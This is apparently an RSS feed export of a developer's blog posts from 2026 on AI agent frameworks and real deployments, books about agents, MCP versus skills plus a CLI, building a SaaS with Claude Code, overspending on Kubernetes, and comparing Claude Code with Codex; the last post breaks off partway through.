Lakshmi Narasimhan

I Went Looking for Real-World AI Agent Examples. They're Rare.

Lakshmi Narasimhan — Mon, 22 Jun 2026 00:00:00 +0000

I’ll be honest up front: I’m still learning this stuff. I’m not writing this from a mountaintop. I’m writing it from the foothills, with muddy boots, having just figured out something that I suspect a lot of people pretend they already knew.

Here’s the thing that finally clicked for me. An agent is a loop. A model looks at the situation, decides one next step, calls a tool to do it, looks at what happened, and goes around again until it’s done. That’s it. I felt a little cheated when I understood it — the word “agent” had been doing so much heavy lifting on so many landing pages that I’d assumed there was a fortress behind it. There isn’t. There’s a while-loop.

So I went and read about the frameworks. All of them — LangGraph, CrewAI, LlamaIndex, the OpenAI Agents SDK, Pydantic AI, smolagents, the Claude Agent SDK, the vendor SDKs from Google and Amazon and Microsoft. And every single one walks you through the same starter example: a weather bot. Or “chat with your PDF.” Or my personal favorite, the demo where five agents — a Researcher, a Writer, a Critic, an Editor, and presumably a Manager to schedule their standups — collaborate to producea blog post slightly worse than one agent would’ve written.

And I kept thinking:okay, but where are the real ones?

Not the demos. Not the quickstart. Something non-trivial. Something that acts on the world, where a wrong move costs money or breaks production. I genuinely couldn’t picture one. So instead of pretending, I went looking.

(The method, since it’s too on-the-nose not to mention: I sent asmall swarm of research agents out across the web to comb engineering blogs and case studies for me, in parallel, while I made coffee. Hunting for proof that real agents exist turned out to be the most real agent use I’d touched all week. Make of that what you will.)

Here’s what I actually found.

The good news: real ones exist

A few of them are unambiguously real, and they’re worth describing, because they taught me more about what an agent isfor than any framework doc did.

Sentry’s Autofix is the one that changed my mind. When something breaks in a codebase Sentry monitors, an agent built on the Claude Agent SDK takes their root-cause analysis, plans a fix,writes the code, and opens a pull request you can actually merge — a full run in about six minutes. This isn’t a chatbot that suggests you “consider checking your null values.” It writes the patch. And it runs against a platform doing over a million root-cause analyses a year. One of their engineers shipped it in weeks and wrote a piece literally titledhow Sentry’s AI Autofix changed my mind about AI agents. I felt seen.

Amazon has an internal agent that troubleshoots network failures — diagnoses live VPC connectivity problems and resolves around 80% of network root causes on its own. Built on theirStrands SDK. That’s an on-call SRE’s nightmare-shift, handed to a loop. As someone who’s done that shift, that number did something to me.

Coinbase builta toolkit that gives an agent a crypto wallet. The agent can hold funds, sign transactions, and pay for things autonomously. Read that again. We’ve spent this whole article saying the scary part of agents is irreversible action with real stakes — and here’s one wired directly to money on a blockchain, where “oops” is permanent. Terrifying. Also clearly real.

Bilt runsamillion agents — one per user — on Letta, each holding that user’s transaction and engagement history inpersistent memory to drive merchant recommendations. The whole pitch of Letta is memory, and here’s someone betting a recommendation system on it at a scale I can’t fully picture.

And a scattering more, each genuinely non-trivial:Exa’s web-research agent and LinkedIn’s text-to-SQL bot (both on LangGraph, both acting against live production systems); amedical-triage agent on Pydantic AI validated across 329 clinician-checked scenarios; aconstruction-tender agent on LlamaIndex that digests 100-page public bids and spits out risk reports; Uber automating code migrations across its monorepo.

So. Real agents exist. I can stop being a skeptic aboutthat.

The uncomfortable news: there aren’t many, and the vendors are grading their own homework

Here’s the part that kept nagging me after the research came back.

For each framework, I could find maybeone to three genuinely non-trivial examples. Not dozens. Single digits. And almost every one of them was published by the company thatsells the framework. Sentry’s story is on Sentry’s blog (fair enough — Sentry isn’t Anthropic), but most of them live in the framework vendor’s own marketing: LangChain’s case-study page, Letta’s case studies, AWS’s own deep-dive, Google’s own developer blog. Independent “here’s our war story and here’s what broke” write-ups from teams with no skin in the game? Vanishingly rare.

And some frameworks I genuinelycouldn’t find a real one for:

smolagents has26,000 GitHub stars and I love its design — but its flagship example is Hugging Face’s own research replication. I found no named company betting anything real on it.
CrewAI is everywhere in demos and has a wall of enterprise logos (PepsiCo, J&J, the DoD), but behind almost every logo is zero operational detail. The one solid story —a five-agent sales pipeline at DocuSign — is, again, on CrewAI’s own blog.
Microsoft’s Agent Framework just hit 1.0 claiming “real-world validation with customers and partners” and then named exactly zero of them. Its most impressive artifact,Magentic-One, is explicitly aresearch system that doesn’t ship inside a product.

I want to be careful here, because I’m still learning and I don’t want to overclaim the cynicism: “I couldn’t find it” is not “it doesn’t exist.” A lot of the realest agent work is surely locked inside companies that will never blog about it. But thepublic record, right now, is thin. Much thinner than the hype implied. The ratio of “agentic platform” marketing to “here is a real agent doing a real job” is grim.

Two things I think I’m learning

I’m holding these loosely, because foothills. But:

The best real agents are vendors using their own tools. Amazon’s network agent,Google’s enterprise agents on ADK, Strands originating inside Amazon Q Developer — the most concrete, number-backed cases are companies dogfooding the framework they built. That’s either reassuring (they believe in it enough to run it) or a little hollow (of course the toolmaker has the best tool demo). Probably both.

Every real one acts. None of them chat. This is the pattern that actually reorganized my thinking. Line up the genuinely non-trivial agents — writes a mergeable PR, signs a transaction, resolves a network outage, holds a million users’ memory, files a risk report on a 100-page tender. Not one of them is a conversation. The toys all talk. The real onesdo. The demos cluster around chat because chat is safe and reversible and impresses in a screenshot. The real ones cluster around irreversible action because that’s where an agent is actually worth the risk of building.

Which, looping all the way back, is exactly why the weather bot felt so empty. A weather bot doesn’tdo anything. It’s the loop with the stakes amputated.

So where does that leave a beginner

I don’t have a grand conclusion. I have a working hypothesis, which is the most an honest learner should claim: the framework you pick matters far less than whether you have a real job that needs an agent thatacts. If you don’t, no framework will save you — you’ll build a five-agent demo and quietly stop opening the repo. If you do, the loop is twenty lines, and you should start with whichever framework hides the least so you can actually see what’s happening (smolagents, the OpenAI Agents SDK, and Pydantic AI were the ones that got out of my way the most).

And honestly? The fact that real examples are still this rare didn’t discourage me. It read like a timestamp. We’re early. The scarcity isn’t proof the idea is empty — it’s proof most people are still building weather bots while a handful of teams quietly wire a loop up to something that matters.

I’d rather be in the second group — which is why I’m slowlybuilding one of my own. I’m still learning how.

The ledger (the realest example I found per framework, and where it’s published)

Honest tag: most of these are vendor-published. Independent confirmation is scarce — which is part of the story.

Claude Agent SDK — Sentry Autofix: writes mergeable PRs against 1M+ RCAs/yr →blog.sentry.io,claude.com/customers/sentry
AWS Strands — Amazon internal network-troubleshooting agent (~80% of network root causes); origin of Amazon Q Developer →strandsagents.com
Letta — Bilt: ~1M per-user memory agents for recommendations →letta.com/case-studies/bilt
OpenAI Agents SDK — Coinbase AgentKit: agents with on-chain wallets, real transactions →github.com/coinbase/agentkit
LangGraph — Exa web-research agent; LinkedIn text-to-SQL bot; Uber code migrations →langchain.com/blog/exa,top-5 in production
Pydantic AI — STCC medical-triage agentic RAG (329 validated scenarios) →pydantic.dev
LlamaIndex — SoftIQ construction-tender agent (100-page bids → risk reports) →llamaindex.ai case study
Google ADK — Google’s own Agentspace/contact-center agents (6T+ tokens/mo); Renault EV-charger siting; Box contract extraction →developers.googleblog.com
CrewAI — DocuSign 5-agent sales Flow (vendor blog) →blog.crewai.com
smolagents — no named production company found; flagship is HF’s own Open Deep Research →github.com/huggingface/smolagents
Microsoft Agent Framework / AutoGen — mostly research (Magentic-One); 1.0 names zero customers →microsoft.com/research

]]>

Five Books Taught Me to Build AI Agents. All Five Quietly Told Me Not To.

Lakshmi Narasimhan — Sun, 21 Jun 2026 00:00:00 +0000

What four hundred thousand words of agent literature agree on — and never put on the cover.

I bought five books on building AI agents in a single afternoon, the way you panic-buy bottled water before a storm. Manning had a sale. I had a credit card and a vague sense that everyone around me had quietly become an “agent engineer” while I was busy doing my actual job.

So I did the responsible thing. I spun up a small army of subagents to read four of them for me, cover to cover, in parallel, and report back. Which, if you’re keeping score, means I built a multi-agent system to summarize books about how to build multi-agent systems. The irony was not lost on me. It was, in fact, the first thing I learned.

Here’s the second.

The loop is thirty lines

Strip away the diagrams and the framework comparisons, and every single one of these books —Build an AI Agent,Build a Multi-Agent System,AI Agents in Action,AI Agents and Applications — converges on the same humble definition.

An agent is a language model, plus some tools, plus a loop that runs until the job is done.

That’s it. One book states it as plainly as that. Another dresses it up as a four-letter cycle. There’s a Reddit thread floating around that implements the whole thing in about thirty lines of code, set to a drum-and-bass track, and honestly it explains the concept better than half the chapters I read.

There is no secret sauce. There is no priesthood. You were promised a cathedral and what you got is awhile loop with good manners.

Which raised an obvious question, sitting there with four hundred thousand words of agent literature on my screen: if the core idea fits on a napkin, what’s in all these books?

The part nobody puts on the cover

The answer is the same in every one, and it’s the most useful thing I took away.

The loop is the easy ten percent. The other ninety — the part that doesn’t fit in a demo — is evaluation, memory, guardrails, cost control, defending against prompt injection, and the deeply unglamorous skill of knowing when to hand the problem back to a human.

Three of the four books I read point at the same Anthropic paper, “Building Effective Agents,” like it’s scripture. And buried in chapter one of each — past the exciting cover, past the part where they sell you on the future — every author tells you the same quiet thing.

Don’t reach for an agent.

Start with a plain model call. Then a chain. Then a workflow. Earn the agent only when the task genuinely needs one, because an agent costs roughly ten times a normal call. Per task. Now imagine that thing running unattended, all night, while you sleep.

I went looking for the loudest voices on the other side of this — the practitioners on Reddit who build agents for a living and have the scar tissue to prove it. I expected an argument. The top thread is literally titled “Stop building AI agents.” Another is a guy who gotpaid to rip the AI back out of a tool he’d shipped. A third is the 2 a.m. classic: the agent hit a question it didn’t understand, confidently made up an answer, and emailed it to a customer.

The books and the burnouts weren’t arguing. They’d arrived at the same conclusion from opposite ends of the room. The model was never the bottleneck. Running the thing was.

What I’m actually taking away

A small tell that stuck with me: agent-to-agent coordination shows up in thesubtitles of these books far more confidently than it shows up in the chapters. The field is writing about how agents talk to each other a little faster than it’s shipping it. That’s not a knock — it’s a map. It tells you where the hype is and where the ground is still wet.

So here’s my take, for whatever a guy who outsourced his reading to robots is worth.

The framework you pick doesn’t matter much; that code rots in eighteen months. What compounds is the boring stuff the demos skip — evaluation, context discipline, and the judgment to not build the agent at all. Everyone is rushing to learn how tomake an agent. Almost nobody is learning how to make one you’d actually trust.

The capability got democratized this year. The judgment didn’t.

That gap — between the agent that runs and the agent you’d let near production while you’re asleep — is the whole job now. It’s also, conveniently,the only part worth getting good at.

]]>

The "MCP Is Dead" Fight Is a Category Error

Lakshmi Narasimhan — Thu, 18 Jun 2026 00:00:00 +0000

Skills win the solo dev. MCP wins exactly one thing. Here’s the line.

I had the headline before I had the post.

“API + Skills Is a Poor Man’s MCP” — except I was going to argue the inversion: thatMCP is the rich man’s overcomplication, a server process you stood up to wrap calls your agent could already make, and the lean move was always a skill plus a CLI. Spicy. Contrarian. The kind of take that does numbers in a feed.

Then I made the tactical error of fact-checking myself, and the post fell apart in my hands. What follows is the wreckage, reassembled into something truer than the dunk I wanted to write.

TL;DR: Skills and MCP aren’t competitors — comparing them is a category error. A skill is a recipe that runs inyour runtime; MCP is a connection to a hosted service. For a solo dev wiring up their own workflow on a coding agent, skill + CLI wins on every axis that used to favor MCP — the context-bloat and cross-vendor arguments both got quietly erased in late 2025/early 2026. MCP earns its keep in exactly one situation: you’re aprovider exposing a live, OAuth’d service to assistants you don’t own. The rule that falls out:consuming an API → skill + CLI. Providing a service → MCP.

The category error I was about to commit

The first crack: “API + skills vs MCP” quietly assumes the two live on the same shelf. They don’t.

Askill is knowledge. A markdown recipe — plus maybe a script — that teaches the agent how to do something, running inyour runtime, onyour machine, with tools you already have.

MCP is a connection to a running service. A server, behind a protocol, that the model talks to.

Comparing them is apples to orchards. One is “here’s how, go do it.” The other is “here’s a thing that’s already running, call it.” Most of the internet argues about them as if they’re competing products. They’re not even the same noun.

So the honest question isn’t “which wins.” It’s “when does a hosted service behind a contract beat a recipe you run yourself?” That’s a real question. I just assumed I knew the answer.

The two arguments that died before I finished typing

My case against MCP rested on two pillars. Both had already collapsed, and I hadn’t noticed.

Pillar one: context bloat. Every MCP server dumps all its tool schemas into the context window — a seven-server setup could eat 67K tokens before you typed a word, andthe context window is the one resource your agent can’t buy back. Damning. Except in January 2026 Anthropic shipped tool search anddefer_loading: now the model sees a search tool plus a couple of always-on tools, and pulls the rest on demand. Reported reductions of 85–95%. My killer stat became a “this used to be true.”

Pillar two: cross-vendor reach is MCP’s moat. Wrong by a different calendar. In December 2025, Agent Skills shipped as an open standard, and within 48 hours Microsoft put it in VS Code and OpenAI added it to ChatGPT and Codex. By spring, ~40 tools — Gemini CLI, JetBrains, Kiro, Goose — read the sameSKILL.md. Skills are as universal as MCP now. The moat drained while I was sharpening my knives.

Fine. Two pillars down. The dunk still had three legs, I figured.

Watching the rest fall

Security? I’d claimed MCP gives you a safety edge. It doesn’t. If I want read-only GitHub access, I hand a read-only token to the skillor the MCP server — identical. The token scope is the gate, enforced at the API boundary, available to both. There’s no protocol-level security advantage. Gone.

Tokens? This one inverts, which delighted me until I realized it cut against my own thesis too. People assume MCP is token-cheap because the call —list_pull_requests(owner, repo) — is tidy. But thecall isn’t the cost. Theresult is. The GitHub API returns fat JSON, and a raw MCP tool call dumps the whole blob into context. A skill that runs code can filter in the sandbox and return five lines. So code-that-filters wins on tokens — and a skill is code-that-filters by birth. But that’s an argument for skills, not against MCP-the-idea.

Auto-orchestration? “MCP composes calls for you.” No, it doesn’t. The protocol is transport — it has no “run this sequence, give me only the end” primitive. Either the model loops (every intermediate result round-trips through context — expensive) or a human pre-bakes a coarse server tool (effort). Automatic, token-cheap stacking only happens when you call toolsfrom code — which is, once again, the skill model.

Every road kept leading back to the same place. I started to feel like the universe was trying to tell me something(sounds dramatic, I know).

The litmus test that almost saved the dunk

So I built a concrete test:“Fetch all open PRs, give me a gist of the modules they touch, merge only the ones tagged auth.”

Fetch and gist are reads — data-heavy aggregation, the code-that-filters sweet spot. Skill wins, easily. Butmerge is a write, and a dangerous one, and writes are where I figured MCP’s permission policy — pause and confirm each merge — would finally earn its keep.

Then a reader on the thread that became this post pointed out the obvious: gating decomposes into three questions, and only one is even arguably MCP’s.

Capability — can a merge happen at all? Thetoken scope answers that. Available to both. API-enforced.
Selection — which PRs get merged? Yourfiltering code answers that. That’s the skill’s script.
Confirmation — do you approve each one?You, in the loop on a coding agent — or a--confirm flag — or MCP’s native prompt.

Only the third row is MCP’s, and even there it’s matched by you-watching-bash or a confirm flag. On a coding agent with you present, skill plus thegh CLI wins the whole task. The merge didn’t flip it.You’re the permission policy.

That was the moment the dunk officially died. I went looking on Reddit to see who else had buried it.

What Reddit already knew

Turns out, everyone. The threads are a graveyard with two opposing headstones.

“Will MCP be dead soon?” — 406 comments.“I cannot, for the life of me, understand the value of MCPs” — 305 comments.“A eulogy for MCP (RIP).”“CLI > MCP?” Someone even shipped a tool that converts MCP servers into CLI + skill files and “cut ~97% token overhead.”

The auto-generated TL;DR of that 305-comment thread is, embarrassingly, the post I’d spent a day reverse-engineering:“You’re looking at this from a solo dev’s perspective, and you’re not wrong — Skills or telling Claude to use a CLI is often more efficient. MCP’s real value isn’t for your individual coding session, but for the broader ecosystem.”

So the solo-dev case is settled. But the people defending MCP weren’t demo-app tourists. They were running it in production, and they landed one punch I couldn’t slip.

The punch I couldn’t slip, and the one real win

From the eulogy thread, top comment:“People who claim there’s no need for MCP will, if they build projects of growing complexity, sooner or later reinvent everything MCP provides — but bespoke and non-standardized.” And a sharper one:“CLI + skills are great for solo dev vibes. But the second you need an LLM to orchestrate across multiple platforms with real auth and governance? You’re either using MCP or rebuilding it badly.”

That’s the one thing that survived every round. Not context, not security, not reach, not tokens.Distribution — of a specific kind.

Here’s the case, and it’s narrower than the hype and realer than my dunk: you’re aprovider. You host a live service and you want it to show up as a one-click, OAuth’d connector inside every AI assistant your customers already use — Claude’s Connectors Directory (200+ integrations), ChatGPT Apps, all of it. Notion, Linear, and Stripe ship official remote MCP servers for exactly this. You build once; it lights up everywhere; the credentials and compute stay on your side.

A skill — even a universal one — cannot be that. A skill is a copy that runs in the consumer’s runtime, and that’s the whole limitation: it can only do what that runtime can do. Flip that around and you get the same win seen from the client’s side. Claude Desktop runs skillsand has a code sandbox — but the sandbox can’t reach the open internet, so a skill that tries to curl GitHub dies at the egress wall, while an MCP server, running outside the box, reaches it fine. Same task, opposite answer, deciding variable is network egress. It’s not a second reason to use MCP. It’s the first reason wearing a different hat: when the consumer’s runtime can’t reach the thing, you need a service that can.

The rule: when to use MCP vs a skill + CLI

So, do you need MCP? Ask one question:are you consuming an API, or providing a service?

Wiring your own agent to someone’s existing API, on a coding tool with a shell — skill plus a CLI, every time. You will not “reinvent MCP badly,” because you need none of what MCP provides: no OAuth dance, no dynamic discovery, no cross-client reach. The CLI is complete, not a degenerate clone.

Exposing your own live service to assistants you don’t own, with auth and governance, across vendors — that’s MCP, and a CLI genuinely can’t do it.

MCP isn’t the poor man’s anything. It’s theplatform’s protocol. You reach for it the moment you stop consuming APIs and start being an app inside other people’s assistants.

I know which side I’m on this week. I shipped ThreadHQ’s MCP server as a top-of-funnel for a reason — that’s the provider play, done on purpose. (ThreadHQ is one of the products Ibuilt solo with Claude Code; the MCP server is its distribution edge, not its plumbing.) But for the GitHub task on my own machine? I’m still just typinggh. The dunk was wrong. The honest version is sharper anyway.

]]>

How to Build a SaaS with Claude Code in a Weekend (Not a Quarter)

Lakshmi Narasimhan — Mon, 15 Jun 2026 00:00:00 +0000

I caught up with one of my mentees last weekend. Just talking shop. He’s a solid developer, he’s got the itch to build a side project, and he’s brand new to agentic coding. Somewhere in that conversation I realized I was reciting an entire playbook off the top of my head — so I’m writing it down. If you can write code and you’re staring at Claude Code wondering how to actually build and ship a SaaS with it, this is for you.

A quick word onwhy now, before thehow. Two reasons, and you’ve heard at least one:

AI is eating the jobs. You can’t open your phone without someone reminding you. Enough said.
The AI subsidy is going to end. Right now you’re building on frontier models that cost the labs more than they charge you. That window closes.I wrote about this here

Maybe both happen. Either way the move is the same: build the muscle now, while it’s cheap and you still have an edge.

1. What to build

Scratch your own itch. Do not spend three weeks “researching the market” to discover what people want. If you have a problem an app would fix, give yourself permission to build it. We’ll worry about market sizeafter it ships.

Market research used to be load-bearing because building was expensive and being wrong was catastrophic — months of work, real money, dead on arrival. That math is gone. You can ship an app over a weekend now. The cost of being wrong is one wasted Saturday.

Paul Graham makes the sharper version of this point: build whatyou want, because — as he writes inHow to Earn a Billion Dollars — “your own needs are uniquely valuable, because your needs predict future demand.” You’re not guessing what strangers want. You’re scratching an itch you can actually feel.

I’ve written about finding an idea and shipping it in a single sitting —here.

2. Know where you’re standing

Be honest about your starting point: do you have real development experience, or do you need to ramp up first?Here’s what I’d master before letting AI build for you

Yes, there are people on the internet shipping apps with zero coding background. Maybe. But if you can’t read what Claude Code writes, you can’t steer it — and you’ll feel that the first time it confidently drives into a wall. You don’t need a CS degree. You need enough of a mental model to call BS. The good news: you can learn developmentfrom Claude Code while you buildwith it. Learning and building at the same time is completely legitimate — it’s how I pick up half the things I use.

3. How I actually build

There’s no one true way. This is what works for me; your mileage may vary.

First, the unglamorous part: get the Claude Code Max plan. The $100 tier, or the $200 one if you can swing it. You cannot build anything meaningful on the cheap plans, and you’ll discover exactly why about four hours into your first real session. Don’t flinch at the price — it’s still cheaper than a tutor or a freelancer, and it doesn’t take lunch breaks. Plus the quality is consistently good.

Why Claude Code and not [the benchmark-topping model of the week]?

Because building a startup is already exhausting, and you do not have spare energy to spend benchmarking models and sharpening tools instead of shipping. Pick what works and stick with it.

Codex is a close second — genuinely good, and I keep it around. But Claude Code stays a step ahead for actually building apps, and after working with both, I reach for it first. Use both if you like. Just don’t turn tool selection into the project.

Boring choices win

Freeze your stack early — backend, frontend, database. 80% of it is identical across every app you’ll ever build, so stop re-deciding it every time. And don’t obsess over scale and optimization. Those are problems youearn by being successful. Good problems. You don’t have them yet.

4. Specs and context engineering: the part that decides everything

Two things determine whether you get your money’s worth out of Claude Code:

The specification
Context engineering

The spec

The more specific you are, the better the output. “Build a to-do app” gets you slop. “Here’s the auth flow, here’s the data model, here are the exact features” gets you something you can use. Spend real time here, before a single line of code gets written.More on this

The move that works best: make Claude Code interviewyou about the spec. If you can’t answer its questions, you can’t articulate the feature — and if you can’t articulate it, you can’t build it. By the time the spec is done, the MVP should have zero grey areas.

Context engineering

Even the best frontier model starts coding like it’s three drinks deep once the context fills up. So you manage it.

This takes me back to my assembly-language days — limited registers, limited memory, every instruction written with one eye on the resources you didn’t have. LLM context is that same constraint in new clothes. You get roughly 200k tokens, and that’s nowhere near enough to hold your whole app in its head at once.

So: one task per session. Two at the absolute most. Which means breaking the spec into session-sized tasks and tracking what’s done, what’s in flight, what’s blocked, and what depends on what.

A markdown to-do file is a terrible way to do this and a worse use of your time. I usebeads. Adopted it early, still on it. It’s the fix foran agent that wakes up every morning with no memory of what you did yesterday.

This practice is also a lot kinder for your token limits.

Two flavors:

the original, by the author —gastownhall/beads
beads-rust, a simpler, more stable reimplementation of the spec in Rust —Dicklesworthstone/beads_rust

Use either. I landed on beads-rust. Pick your poison.

You also need memoryacross sessions. You’ll remember you fixed a bug two weeks ago; the model in today’s session won’t, and it’ll cheerfully hand you a wrong answer when you ask “did we already fix this?” I useclaude-mem for that —thedotmack/claude-mem.

Point a Claude Code session at both repos and it’ll install them for you. (Yes, these work with Codex too — but again: shipping or tuning? The clock is running.)

Remember that spec? Hand it to your beads skill and it breaks down into a clean task list. Ask Claude to pull the high-leverage beads and start there — never more than two in flight.

Your CLAUDE.md matters

Treat it as a compass, not a second spec. The practices that matter (write the tests first), how the app deploys, the handful of goals you’re aiming at. Keep it light —cramming a novel into CLAUDE.md is the fastest way to make Claude dumber.

One more tool

ccstatusline. Configure it to show your remaining context percentage. It’s the fuel gauge that tells you whether to keep driving or pull over and start a fresh session.

Then it’s rinse and repeat: feed beads to Claude, do the manual QA yourself, close the bead, next one. A few sessions in, a sliver of a working MVP starts to emerge. When you’re happy with it, you ship.

5. Deploying it (without the Kubernetes tax)

I was a Kubernetes guy for years. Deployed everything on it. I no longer recommend it for solo developers —I explain why here. It still has its place and time; your weekend project is neither.

UseKamal instead. Think of it as the compromise between Docker Compose and Kubernetes — Compose’s simplicity, enough of Kubernetes’ robustness, none of the YAML despair.

I’m also buildingVMKit to make this part disappear entirely — deploy without learning the nitty-gritty unless you want to.

Then there’s the wiring you don’t think about until it bites: monitoring and ops (I run mine through MCPs —the $30 stack), payments (Stripe; if you’re in India, Dodo Payments), and distribution — marketing and positioning, which is a beast all its own. Each of these deserves its own post.

TL;DR

Build for your own itch. Shipping is cheaper than market research now.
Get the Claude Code Max plan ($100, ideally $200). Don’t tool-shop.
Spend your time on the spec — let Claude interview you until there are no grey areas.
Engineer your context: one task per session, tracked with beads, remembered with claude-mem.
Keep CLAUDE.md light. Watch your context gauge.
Deploy with Kamal, not Kubernetes. Wire payments and monitoring last.
The whole thing is a weekend, not a quarter.

]]>

Your Cloud Bill Is A Tax On Someone Else's Resume

Lakshmi Narasimhan — Fri, 24 Apr 2026 00:00:00 +0000

There’s an insurance company somewhere — real, working, profitable — with 100,000 monthly users and a peak concurrent load of about 5,000.

They spend high six figures a month on Kubernetes.

They employ twenty people to keep it running.

This story surfaced this week in the Hacker News thread on David Crawshaw’s cloud essay, and the comments section turned into a confessional. Engineer after engineer describing the same pattern: cluster adopted, cluster “optimized,” cloud spend doubled, incidents doubled, and somehow the only thing anyone can agree on is that they need to hire a platform engineer.

You don’t. You never did. Your entire application would run on a laptop.

The incentive nobody likes to say out loud

Here’s the quiet part: your DevOps team does not choose infrastructure based on what your application needs.

They choose it based on what their next job will pay for.

Kubernetes on a resume is worth more than Docker Compose on a resume. Terraform on a resume is worth more than “I SSH’d into the box.” Managed EKS on a resume is worth more than “I run a VM.” Every procurement decision in a modern engineering org is being made by someone who, at some level, is also writing the next page of their LinkedIn.

And management, god bless them, trusts the sales and marketing departments of Datadog and AWS and HashiCorp more than they trust their own engineers. So when someone internally says “we could do this on one server,” and someone externally sends a deck titledScaling Your Platform For The Future, guess which one wins the meeting.

The decision was never technical. You just paid the technical price for it.

Kubernetes is not the villain. The scale is.

Let’s be precise, because “Kubernetes” is doing a lot of work in this essay.

Full enterprise Kubernetes — managed control planes, service meshes, operators for everything, a dedicated platform team, Helm charts nested inside Helm charts like Russian dolls of YAML — that thing was built for Google’s problem. Multi-tenant, multi-region, thousands of services, teams that don’t talk to each other.

If your org does not look like that, you are wearing a costume.

K3s on a single VPS is not the same animal. Docker Compose on a single VPS is not the same animal. Kamal shipping containers to one Debian box is not the same animal. Those are orchestration for people who want one sane way to deploy a container, not a career in platform engineering.

The HN thread is full ofengineers who moved from full K8s to one of these simpler setups. The reports are boringly consistent: costs collapsed, incidents dropped, debugging became possible again. Nobody was shocked. Everyone had been waiting for permission to say it.

The solo founder’s version of this trap

You are not the insurance company. You do not have twenty people. You have you, and maybe a contractor, and a credit card that is getting nervous.

And yet — you will read the AWS Well-Architected Framework. You will follow a tutorial that starts with “first, let’s set up your VPC.” You will pay $80/month for a managed database to store 200 rows. You will provision a load balancer in front of one server. You will copy the shape of infrastructure you saw at your day job, because that shape felt legitimate, and you want to feel legitimate too.

This is how solo founders end up with a$600/month AWS bill for an app that has six users.

The shape of legitimacy is the trap. Nobody cares what your infrastructure looks like until you have customers, and once you have customers,“my app runs on one $12 VPS” is a story peoplelove. It’s the opposite of suspicious. It’s proof that the thing works.

What to actually do

One machine until you can’t. One VPS. One Postgres on that VPS. One reverse proxy. Docker Compose or Kamal to deploy. You are allowed to stop here for years.
Scale vertically first. Hetzner will rent you a 48-core EPYC machine with 256 GB of RAM for €199/month. A mid-tier managed Kubernetes cluster on AWS starts at more than that before you’ve run a single pod. Most apps die from bad unit economics, not from running out of CPU.
When you outgrow that — and you might not —K3s on a few boxes gives you orchestration without the org chart. This is the actual sweet spot for a solo operator who needs more than one machine but less than a platform team.
Treat every infrastructure recommendation as a resume artifact until proven otherwise. Ask who benefits if you adopt this. If the answer is “the person telling me to adopt it,” weigh accordingly.
Your cloud bill is a leading indicator of how much time you are spending on things that do not make your product better. Watch it like you watch your weight.

The cloud was supposed to be leverage. For most people, most of the time, it has become the opposite: a recurring invoice for someone else’s credibility.

You are allowed to just run the server.

]]>

Claude Overreaches. Codex Underreaches. I'm Still Figuring Out How to Use Both.

Lakshmi Narasimhan — Wed, 22 Apr 2026 00:00:00 +0000

I was a one-agent guy until Claude had a run of outages.

On those days I didn’t ship less. I shippednothing. I’d open my editor, remember Claude was down, stare at the codebase, close the editor. A single-vendor dependency masquerading as a workflow.

So I reluctantly installed Codex CLI. Poked at it. Resented it for a week. Then task by task — caught myself reaching for it on purpose, even when Claude was up.

I still don’t have the workflow figured out. What I do know is that “pick one” is the wrong frame, and the Reddit threads that get it right aren’t the ones with the most upvotes.

The One Sentence That Explains Everything

From a 520-upvote r/ClaudeCode thread analyzing both tools’ open-source prompts:

“Claude Code reads like a product trying to create initiative while Codex reads like a product trying to prevent drift.”
— u/idkwhattochoosz

And the pithier version, from the comments:

“Claude is more willing to sin by overreaching. Codex is more willing to sin by underreaching.”
— u/entheogenicentity

Read those twice. That’s not a model-quality take. That’s a product-philosophy take. Two teams looked at the same question — what should an agent do when it doesn’t know what you meant? — and picked opposite defaults. One said “guess and move.” The other said “ask and wait.”

Claude Code’s system prompt pushes hard toward initiative:“A good colleague faced with ambiguity doesn’t just stop — they investigate, reduce risk, and build understanding.” Codex’s harness does the opposite: narrow the ambiguity, verify, don’t guess.

Every “Claude vs Codex” benchmark you’ve seen is scoring two products that were never competing on the same axis. It’s like benchmarking a kayak against a sedan because they both move you forward.

My Honest Opinion: Codex’s Harness Is Better

This is going to get me yelled at in r/ClaudeCode, and that’s fine.

After several weeks running both, Codex’s harness feels more mature. Not the model — the harness. The scaffolding around the model. The way it handles ambiguity, scope, and completeness.

Three things Codex does that Claude Code still doesn’t:

1. It doesn’t lie about completion. Claude will hand you a summary saying the work is done, tests pass, shipping-ready. Codex more often flags what it didn’t fix, what it wasn’t sure about, what it skipped. One r/ClaudeCode commenter put it better than I can:“Claude will always claim all is done and ready, while Codex will flag it and say ‘no, there is this and this and this that still need to be fixed.’”

2. It respects your instructions. Claude treatsCLAUDE.md as a helpful suggestion. Codex treatsAGENTS.md as a contract. If you tell Codex “don’t touch the migration files,” it doesn’t touch them. If you tell Claude the same thing, you’ll find a migration file edit in the diff and a cheerful note about how it improved schema consistency.

3. The restraint scales better. Claude’s “volunteer more” bias is delightful at 30 minutes of work. It becomes a liability at 3 hours. Codex’s restraint is annoying in a small task and load-bearing in a long one.

None of this means Claude Code is bad. It means Claude Code is optimized for a different shape of work than I’m doing. The initiative bias is a great fit for exploration and greenfield work. For production changes to a real codebase, Codex’s paranoia is the right default.

Here’s the one that changed my mind. I built Supabyoi (managed self-hosted Supabase) with Claude Code. When the MVP felt feature-complete — Claude’s verdict, confidently delivered, complete with a tasteful little summary of everything that worked — I ran a second pass on Codex in a parallel directory (~/supabyoi-codex). Just to see.

Codex came back with a whole second project’s worth of findings. Not the usual “bugs Claude missed.” Bugs Claude hadconfidently signed off on. Shipping-ready, per Claude. Not shipping-ready, per Codex. Codex was right about every one of them.

That was the week I stopped treating Codex as the thing I installed during an outage and started treating it as a different kind of reviewer. Not better. Differently biased. A second pair of eyes is only useful if it’s not the same pair of eyes.

Why You Should Actually Run Both

The flip side — and this matters, because I don’t want this post read as “switch to Codex, you fool” — Claude’s initiative bias is a real asset. You just have to point it at the right phase of the work. The problem isn’t Claude. It’s that you’re using Claude for the part of the job Codex is better at, and vice versa.

Four reasons to dual-sub instead of picking:

1. Hallucination diversity. This is the biggest one and almost nobody articulates it clearly. From u/campbellm on Reddit:

“I’ve been doing ‘have claude write something, have codex review it, have claude consider and critique that review.’ It is VERY unlikely that both will hallucinate the same way.”

Two models trained on different data with different RLHF signals don’t fail identically. When Claude writes confident-but-wrong code, Codex flags it. When Codex skips a subtle edge case, Claude’s “check adjacent concerns” bias picks it up. You get a natural adversarial review without hiring anyone.

